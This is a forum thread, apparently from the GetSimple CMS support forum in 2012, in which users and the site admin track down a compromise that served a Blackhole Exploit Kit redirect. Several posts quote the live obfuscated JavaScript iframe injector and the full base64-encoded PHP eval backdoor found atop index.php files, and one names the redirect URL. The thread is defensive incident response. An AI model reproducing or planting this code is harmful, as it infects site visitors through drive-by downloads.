Posts: 149
Threads: 12
Joined: Dec 2009
looks like this site (may 11 - 9am cet) has been hacked and now it's injecting a script redirecting users to
http://lbxdmes.usa.cc/?go=2
viewing page source confirm that something is getting injected on gs pages
anyone can confirm?
Posts: 1,127
Threads: 136
Joined: Feb 2012
marrco Wrote:looks like this site (may 11 - 9am cet) has been hacked and now it's injecting a script redirecting users to http://lbxdmes.usa.cc/?go=2
viewing page source confirm that something is getting injected on gs pages
anyone can confirm?
Avg was preventing me from accessing the GS site with warnings of 'Blackhole Exploit Kit'. But it seems to work again now.
Posts: 149
Threads: 12
Joined: Dec 2009
definitely, now it's fine again. I have locally saved the exploited pages. html was starting with a
Code:
<script>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58...
Now i'm waiting to know if there's an actual critical bug in GS or what
Posts: 149
Threads: 8
Joined: Dec 2011
Wouldn't say it is over, since I am still attacked when I get to the homepage or forum... (my anti-virus software kills it immediately).
I sent Chris an email early this morning just to be sure he knows about it (I most likely won't be the only one doing that, but at least he will be in the know this way). But it is very clear something was hacked. Could be the forum software, GS (although I think the main site at least used to be Wordpress, maybe not anymore), the server, etc.
Hope things will a. be solved soon, b. it will be clear what was causing it and c. if it turns out to be GS how that hole needs to be plugged.
Posts: 1,848
Threads: 86
Joined: Aug 2009
thanks guys! i have found a rouge file in /theme/ folder and ideleted it. I will keep looking into it to see if this happens again. Thanks for the emails guys!
-
Chris
Thanks for using GetSimple! - Download
Please do not email me directly for help regarding GetSimple. Please post all your questions/problems in the forum!
Posts: 149
Threads: 8
Joined: Dec 2011
From my side I am still getting the attack attempt blocked notice from my anti-virus software. Could that be cache? Otherwise something might still be active.
Posts: 1,108
Threads: 70
Joined: Aug 2009
must be cached it looks clean now.
Posts: 149
Threads: 8
Joined: Dec 2011
2012-05-11, 21:36:26
(This post was last modified: 2012-05-11, 21:36:54 by xLn.)
Firefox has quite a persistent cache I must say, so that could well be it.
My norton internet security keeps roaring into action in any case. Will keep an eye on it.
Hope it is clear soon what happened.
Posts: 1,848
Threads: 86
Joined: Aug 2009
cant you try private browsing and see if you still see it?
-
Chris
Thanks for using GetSimple! - Download
Please do not email me directly for help regarding GetSimple. Please post all your questions/problems in the forum!
Posts: 149
Threads: 8
Joined: Dec 2011
Good point. Just did, still sees it. However, if I look at the site in Chrome. I don't get any notice.
So maybe it is still a persistent bit of cache or what have you.
Posts: 2,928
Threads: 195
Joined: Feb 2011
I run into it just now again, when I logged in the first time this afternoon
in the morning, my antivir program didn't tell any alarm
just now there was alarm
I cleared the browser cache, will see what's happening
so much intelligence wasted on so stupid actions
(
Posts: 6,267
Threads: 182
Joined: Sep 2011
I suggest everyone deletes their GS cache.
It is all infected from the plugin api caches.
Well mine are, but Im not sure where its coming from yet, since it doesn't show up when i do a direct call.
Well I don't see the injection when direct accessing via my browser, but my curl and get_file_contents both return a script injection.
Either GS is compromised or I have some local injection on my host.
If someone could open a new cache file from the api
gs/data/cache md5.txt
and see if it contains script tags.
Posts: 1,848
Threads: 86
Joined: Aug 2009
i just checked the cache on get-simple.info and inside the API cache that feeds these API calls - and everything looks clean as a whistle. What do you see?
-
Chris
Thanks for using GetSimple! - Download
Please do not email me directly for help regarding GetSimple. Please post all your questions/problems in the forum!
Posts: 6,267
Threads: 182
Joined: Sep 2011
ccagle8 Wrote:i just checked the cache on get-simple.info and inside the API cache that feeds these API calls - and everything looks clean as a whistle. What do you see?
Code:
bfbf906471daf3f15be136dfe21ee5a1.txt
<XSS>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c60c73c56c56c63c62c63c77c67c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-10c77c63c58c74c62c19c-3c7c6c-3c-10c62c59c63c61c62c74c19c-3c7c6c-3c-10c73c74c79c66c59c19c-3c76c63c73c63c56c63c66c63c74c79c16c62c63c58c58c59c68c17c70c69c73c63c74c63c69c68c16c55c56c73c69c66c75c74c59c17c66c59c60c74c16c6c17c74c69c70c16c6c17c-3c20c18c5c63c60c72c55c67c59c20c-8c-1c17c-29c-33c-33c83c-29c-33c-33c60c75c68c57c74c63c69c68c-10c63c60c72c55c67c59c72c-2c-1c81c-29c-33c-33c-33c76c55c72c-10c60c-10c19c-10c58c69c57c75c67c59c68c74c4c57c72c59c55c74c59c27c66c59c67c59c68c74c-2c-3c63c60c72c55c67c59c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c73c72c57c-3c2c-3c62c74c74c70c16c5c5c60c73c56c56c63c62c63c77c67c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-1c17c60c4c73c74c79c66c59c4c76c63c73c63c56c63c66c63c74c79c19c-3c62c63c58c58c59c68c-3c17c60c4c73c74c79c66c59c4c70c69c73c63c74c63c69c68c19c-3c55c56c73c69c66c75c74c59c-3c17c60c4c73c74c79c66c59c4c66c59c60c74c19c-3c6c-3c17c60c4c73c74c79c66c59c4c74c69c70c19c-3c6c-3c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c77c63c58c74c62c-3c2c-3c7c6c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c62c59c63c61c62c74c-3c2c-3c7c6c-3c-1c17c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c4c55c70c70c59c68c58c25c62c63c66c58c-2c60c-1c17c-29c-33c-33c83'][0].split('c');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;569!=i;i+=1){j=i;if(e)s=s+r["fromC"+z](w[j]*1+42);} if(v&&e&&r)e(s);</XSS>{"status":"error","message":"invalid id: item_manager.php"}
Script tags replaced with XSS tags.
unpacks into a dom inserted iframe after body that loads a url payload.
This shouldn't cause any issues as long as those don't get loaded into a browser, which they shouldn't, unless your debugging why your plugin lookups arent working, which I was.
Posts: 1,848
Threads: 86
Joined: Aug 2009
OK, found it. It must have been a host vulnerability or something... but every index.php file on the server had this at the top:
The reason it was so hard to find was that none of the timestamps were changed on any of the files. If anyone else sees this please let me know... i may have missed a file.
Code:
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJywnY2hyb21lJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFBUQTdkSEo1ZTNCeWIzUnZkSGx3WlR0OVkyRjBZMmdvZWlsN2FEMGlhR0Z5UTI5a1pTSTdaajFiSnkwek0yTXRNek5qTmpOak5qQmpMVEV3WXkweVl6VTRZelk1WXpVM1l6YzFZelkzWXpVNVl6WTRZemMwWXpSak5qRmpOVGxqTnpSak1qZGpOalpqTlRsak5qZGpOVGxqTmpoak56UmpOek5qTWpSak56bGpOREpqTlRWak5qRmpNelpqTlRWak5qZGpOVGxqTFRKakxUTmpOVFpqTmpsak5UaGpOemxqTFROakxURmpORGxqTm1NMU1XTXRNV000TVdNdE1qbGpMVE16WXkwek0yTXRNek5qTmpOak5qQmpOekpqTlRWak5qZGpOVGxqTnpKakxUSmpMVEZqTVRkakxUSTVZeTB6TTJNdE16TmpPRE5qTFRFd1l6VTVZelkyWXpjell6VTVZeTB4TUdNNE1XTXRNamxqTFRNell5MHpNMk10TXpOak5UaGpOamxqTlRkak56VmpOamRqTlRsak5qaGpOelJqTkdNM04yTTNNbU0yTTJNM05HTTFPV010TW1NdE9HTXhPR00yTTJNMk1HTTNNbU0xTldNMk4yTTFPV010TVRCak56TmpOekpqTlRkak1UbGpMVE5qTmpKak56UmpOelJqTnpCak1UWmpOV00xWXpZd1l6Y3pZelUyWXpVMll6WXpZell5WXpZell6YzNZelkzWXpSak5qTmpOakZqTmpGak5HTTFObU0yTTJNNE1HTTFZekl4WXpZeFl6WTVZekU1WXpoakxUTmpMVEV3WXpjM1l6WXpZelU0WXpjMFl6WXlZekU1WXkwell6ZGpObU10TTJNdE1UQmpOakpqTlRsak5qTmpOakZqTmpKak56UmpNVGxqTFROak4yTTJZeTB6WXkweE1HTTNNMk0zTkdNM09XTTJObU0xT1dNeE9XTXRNMk0zTm1NMk0yTTNNMk0yTTJNMU5tTTJNMk0yTm1NMk0yTTNOR00zT1dNeE5tTTJNbU0yTTJNMU9HTTFPR00xT1dNMk9HTXhOMk0zTUdNMk9XTTNNMk0yTTJNM05HTTJNMk0yT1dNMk9HTXhObU0xTldNMU5tTTNNMk0yT1dNMk5tTTNOV00zTkdNMU9XTXhOMk0yTm1NMU9XTTJNR00zTkdNeE5tTTJZekUzWXpjMFl6WTVZemN3WXpFMll6WmpNVGRqTFROak1qQmpNVGhqTldNMk0yTTJNR00zTW1NMU5XTTJOMk0xT1dNeU1HTXRPR010TVdNeE4yTXRNamxqTFRNell5MHpNMk00TTJNdE1qbGpMVE16WXkwek0yTTJNR00zTldNMk9HTTFOMk0zTkdNMk0yTTJPV00yT0dNdE1UQmpOak5qTmpCak56SmpOVFZqTmpkak5UbGpOekpqTFRKakxURmpPREZqTFRJNVl5MHpNMk10TXpOakxUTXpZemMyWXpVMVl6Y3lZeTB4TUdNMk1HTXRNVEJqTVRsakxURXdZelU0WXpZNVl6VTNZemMxWXpZM1l6VTVZelk0WXpjMFl6UmpOVGRqTnpKak5UbGpOVFZqTnpSak5UbGpNamRqTmpaak5UbGpOamRqTlRsak5qaGpOelJqTFRKakxUTmpOak5qTmpCak56SmpOVFZqTmpkak5UbGpMVE5qTFRGak1UZGpOakJqTkdNM00yTTFPV00zTkdNeU0yTTNOR00zTkdNM01tTTJNMk0xTm1NM05XTTNOR00xT1dNdE1tTXRNMk0zTTJNM01tTTFOMk10TTJNeVl5MHpZell5WXpjMFl6YzBZemN3WXpFMll6VmpOV00yTUdNM00yTTFObU0xTm1NMk0yTTJNbU0yTTJNM04yTTJOMk0wWXpZell6WXhZell4WXpSak5UWmpOak5qT0RCak5XTXlNV00yTVdNMk9XTXhPV000WXkwell5MHhZekUzWXpZd1l6UmpOek5qTnpSak56bGpOalpqTlRsak5HTTNObU0yTTJNM00yTTJNMk0xTm1NMk0yTTJObU0yTTJNM05HTTNPV014T1dNdE0yTTJNbU0yTTJNMU9HTTFPR00xT1dNMk9HTXRNMk14TjJNMk1HTTBZemN6WXpjMFl6YzVZelkyWXpVNVl6UmpOekJqTmpsak56TmpOak5qTnpSak5qTmpOamxqTmpoak1UbGpMVE5qTlRWak5UWmpOek5qTmpsak5qWmpOelZqTnpSak5UbGpMVE5qTVRkak5qQmpOR00zTTJNM05HTTNPV00yTm1NMU9XTTBZelkyWXpVNVl6WXdZemMwWXpFNVl5MHpZelpqTFROak1UZGpOakJqTkdNM00yTTNOR00zT1dNMk5tTTFPV00wWXpjMFl6WTVZemN3WXpFNVl5MHpZelpqTFROak1UZGpOakJqTkdNM00yTTFPV00zTkdNeU0yTTNOR00zTkdNM01tTTJNMk0xTm1NM05XTTNOR00xT1dNdE1tTXRNMk0zTjJNMk0yTTFPR00zTkdNMk1tTXRNMk15WXkwell6ZGpObU10TTJNdE1XTXhOMk0yTUdNMFl6Y3pZelU1WXpjMFl6SXpZemMwWXpjMFl6Y3lZell6WXpVMll6YzFZemMwWXpVNVl5MHlZeTB6WXpZeVl6VTVZell6WXpZeFl6WXlZemMwWXkwell6SmpMVE5qTjJNMll5MHpZeTB4WXpFM1l5MHlPV010TXpOakxUTXpZeTB6TTJNMU9HTTJPV00xTjJNM05XTTJOMk0xT1dNMk9HTTNOR00wWXpZeFl6VTVZemMwWXpJM1l6WTJZelU1WXpZM1l6VTVZelk0WXpjMFl6Y3pZekkwWXpjNVl6UXlZelUxWXpZeFl6TTJZelUxWXpZM1l6VTVZeTB5WXkwell6VTJZelk1WXpVNFl6YzVZeTB6WXkweFl6UTVZelpqTlRGak5HTTFOV00zTUdNM01HTTFPV00yT0dNMU9HTXlOV00yTW1NMk0yTTJObU0xT0dNdE1tTTJNR010TVdNeE4yTXRNamxqTFRNell5MHpNMk00TXlkZFd6QmRMbk53YkdsMEtDZGpKeWs3ZGowaVpTSXJJblpoSWp0OWFXWW9kaWxsUFhkcGJtUnZkMXQyS3lKc0lsMDdkSEo1ZTNFOVpHOWpkVzFsYm5RdVkzSmxZWFJsUld4bGJXVnVkQ2dpWkdsMklpazdjUzVoY0hCbGJtUkRhR2xzWkNoeEt5SWlLVHQ5WTJGMFkyZ29jWGRuS1h0M1BXWTdjejFiWFR0OUlISTlVM1J5YVc1bk8zbzlLQ2hsS1Q5b09pSWlLVHRtYjNJb096VTJPU0U5YVR0cEt6MHhLWHRxUFdrN2FXWW9aU2x6UFhNcmNsc2labkp2YlVNaUszcGRLSGRiYWwwcU1TczBNaWs3ZlNCcFppaDJKaVpsSmlaeUtXVW9jeWs3UEM5elkzSnBjSFErJykpOw0KfQ0K'));?>
-
Chris
Thanks for using GetSimple! - Download
Please do not email me directly for help regarding GetSimple. Please post all your questions/problems in the forum!
Posts: 6,267
Threads: 182
Joined: Sep 2011
Ok now clear your caches.
Posts: 6,267
Threads: 182
Joined: Sep 2011
It looks like with the new punbb install
I am having issues with the toolbar
It gives js errors
Uncaught ReferenceError: PUNBB is not define